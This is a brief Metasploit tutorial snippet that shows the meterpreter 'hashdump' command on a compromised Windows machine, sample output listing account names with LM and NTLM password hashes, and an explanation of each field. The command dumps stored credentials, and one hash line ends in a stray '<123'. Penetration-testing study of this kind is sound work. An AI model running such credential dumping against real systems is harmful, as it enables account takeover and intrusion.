Metasploit: Finding Password in Windows Password Hash File

With the meterpreter shell session open

meterpreter > hashdump

The contents of the target system’s password hash file are output to the screen.

Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582::: 
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904::: 
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E::: 
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::<123

Each field is separated with colon. The fields are:

1st field: username (Administrator, User1, etc.)

2nd field: Relative Identification (RID): last 3–4 digits of the Security Identifier (SID), which are unique to each user

3rd field: LM hash

4th field: NTLM hash